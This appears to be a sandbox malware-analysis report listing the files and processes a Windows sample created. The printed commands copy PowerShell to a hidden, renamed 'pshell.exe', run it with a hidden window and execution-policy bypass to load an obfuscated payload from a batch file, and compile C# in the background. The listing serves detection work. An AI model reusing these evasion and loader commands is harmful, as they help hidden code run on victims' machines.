Technical Information
- %TEMP%\ixp000.tmp\vvc.bat
- %TEMP%\ixp000.tmp\pshell.exe
- %TEMP%\dv_go8lq.0.cs
- %TEMP%\dv_go8lq.cmdline
- %TEMP%\dv_go8lq.out
- %TEMP%\ixp000.tmp\pshell.exe
- %TEMP%\dv_go8lq.out
- %TEMP%\dv_go8lq.cmdline
- %TEMP%\dv_go8lq.0.cs
- %TEMP%\ixp000.tmp\pshell.exe
- '%TEMP%\ixp000.tmp\pshell.exe' -noprofile -windowstyle hidden -executionpolicy bypass -command $TcBsmL = (Get-Content -path '%TEMP%\IXP000.TMP\vvc.bat' -raw).Split([Environment]::NewLine);$wtqkty = $TcBsmL[$TcBsmL.Length - 1...
- '<SYSTEM32>\cmd.exe' /c vvc.bat' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dv_go8lq.cmdline"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c vvc.bat
- '<SYSTEM32>\cmd.exe' /S /D /c" echo F"
- '<SYSTEM32>\xcopy.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe pshell.exe /y
- '<SYSTEM32>\attrib.exe' +s +h pshell.exe
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dv_go8lq.cmdline"
- '<SYSTEM32>\attrib.exe' -s -h pshell.exe